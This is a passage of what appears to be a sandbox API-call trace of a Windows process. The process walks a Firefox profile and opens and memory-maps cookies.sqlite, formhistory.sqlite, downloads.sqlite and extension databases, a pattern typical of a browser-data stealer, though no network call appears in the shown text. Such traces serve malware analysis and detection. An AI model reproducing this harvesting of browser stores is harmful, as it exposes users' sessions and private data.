(lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.478] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.478] lstrlenW (lpString="cookies.sqlite") returned 14 [0589.478] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.478] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.478] LocalFree (hMem=0x578c30) returned 0x0 [0589.478] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.478] CloseHandle (hObject=0x668) returned 1 [0589.478] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.478] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.478] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0589.478] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.478] CloseHandle (hObject=0x668) returned 1 [0589.478] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.478] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0589.478] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.478] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.481] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.484] CloseHandle (hObject=0x66c) returned 1 [0589.484] CloseHandle (hObject=0x668) returned 1 [0589.484] LocalFree (hMem=0x56c300) returned 0x0 [0589.484] LocalFree (hMem=0x56afc8) returned 0x0 [0589.484] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.484] lstrlenW (lpString="\\") returned 1 [0589.484] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.484] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.484] lstrlenW (lpString="downloads.sqlite") returned 16 [0589.484] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.484] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.484] LocalFree (hMem=0x578c30) returned 0x0 [0589.484] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.484] CloseHandle (hObject=0x668) returned 1 [0589.484] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0589.484] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.484] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0589.484] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.484] CloseHandle (hObject=0x668) returned 1 [0589.484] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.484] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.484] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.484] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.485] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.486] CloseHandle (hObject=0x66c) returned 1 [0589.486] CloseHandle (hObject=0x668) returned 1 [0589.486] LocalFree (hMem=0x56c300) returned 0x0 [0589.486] LocalFree (hMem=0x56afc8) returned 0x0 [0589.486] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.486] lstrlenW (lpString="\\") returned 1 [0589.486] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.486] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.486] lstrlenW (lpString="extensions.ini") returned 14 [0589.486] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.486] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.486] LocalFree (hMem=0x578c30) returned 0x0 [0589.486] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.486] CloseHandle (hObject=0x668) returned 1 [0589.486] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.486] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.486] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0589.486] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.486] CloseHandle (hObject=0x668) returned 1 [0589.486] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.486] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0589.486] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.486] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.487] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.487] CloseHandle (hObject=0x66c) returned 1 [0589.487] CloseHandle (hObject=0x668) returned 1 [0589.487] LocalFree (hMem=0x56c300) returned 0x0 [0589.487] LocalFree (hMem=0x56afc8) returned 0x0 [0589.487] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.487] lstrlenW (lpString="\\") returned 1 [0589.487] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.487] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.487] lstrlenW (lpString="extensions.sqlite") returned 17 [0589.487] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.487] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.487] LocalFree (hMem=0x578c30) returned 0x0 [0589.487] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.487] CloseHandle (hObject=0x668) returned 1 [0589.487] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.487] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.487] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0589.487] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.487] CloseHandle (hObject=0x668) returned 1 [0589.487] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.487] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0589.487] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.487] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0589.490] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0589.492] CloseHandle (hObject=0x66c) returned 1 [0589.492] CloseHandle (hObject=0x668) returned 1 [0589.493] LocalFree (hMem=0x56c300) returned 0x0 [0589.493] LocalFree (hMem=0x56afc8) returned 0x0 [0589.493] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.493] lstrlenW (lpString="\\") returned 1 [0589.493] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.493] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.493] lstrlenW (lpString="formhistory.sqlite") returned 18 [0589.493] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.493] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.493] LocalFree (hMem=0x578c30) returned 0x0 [0589.493] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.493] CloseHandle (hObject=0x668) returned 1 [0589.493] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.493] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.493] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0589.493] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.493] CloseHandle (hObject=0x668) returned 1 [0589.493] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.493] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0589.493] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.493] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.494] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.495] CloseHandle (hObject=0x66c) returned 1 [0589.495] CloseHandle (hObject=0x668) returned 1 [0589.495] LocalFree (hMem=0x56c300) returned 0x0 [0589.495] LocalFree (hMem=0x56afc8) returned 0x0 [0589.495] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.495] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0589.495] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0589.495] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.495] lstrlenW (lpString="\\") returned 1 [0589.495] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.495] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.495] lstrlenW (lpString="healthreport") returned 12 [0589.495] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.495] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0589.495] LocalFree (hMem=0x578c30) returned 0x0 [0589.496] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.496] lstrlenW (lpString="\\*.*") returned 4 [0589.496] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.496] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.496] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.496] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.496] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.496] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.496] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.496] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0 [0589.496] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.496] LocalFree (hMem=0x56c300) returned 0x0 [0589.496] LocalFree (hMem=0x56afc8) returned 0x0 [0589.496] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.496] lstrlenW (lpString="\\") returned 1 [0589.496] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.496] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.496] lstrlenW (lpString="healthreport.sqlite") returned 19 [0589.496] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.496] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.496] LocalFree (hMem=0x578c30) returned 0x0 [0589.496] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.496] CloseHandle (hObject=0x668) returned 1 [0589.496] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.496] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.496] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0589.496] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.496] CloseHandle (hObject=0x668) returned 1 [0589.496] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.496] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0589.496] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.496] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.501] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.507] CloseHandle (hObject=0x66c) returned 1 [0589.507] CloseHandle (hObject=0x668) returned 1 [0589.507] LocalFree (hMem=0x56c300) returned 0x0 [0589.507] LocalFree (hMem=0x56afc8) returned 0x0 [0589.507] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.507] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0589.507] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0589.507] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.507] lstrlenW (lpString="\\") returned 1 [0589.507] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.507] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.507] lstrlenW (lpString="indexedDB") returned 9 [0589.507] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.507] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0589.507] LocalFree (hMem=0x578c30) returned 0x0 [0589.507] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.507] lstrlenW (lpString="\\*.*") returned 4 [0589.507] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.507] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.507] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.507] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.507] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.507] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.507] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.507] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.508] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0589.508] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.508] lstrlenW (lpString="\\") returned 1 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578c30 [0589.508] lstrlenW (lpString="moz-safe-about+home") returned 19 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x5e1e48 [0589.508] LocalFree (hMem=0x578c30) returned 0x0 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.508] lstrlenW (lpString="\\*.*") returned 4 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x578c30 [0589.508] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52d5e8 | 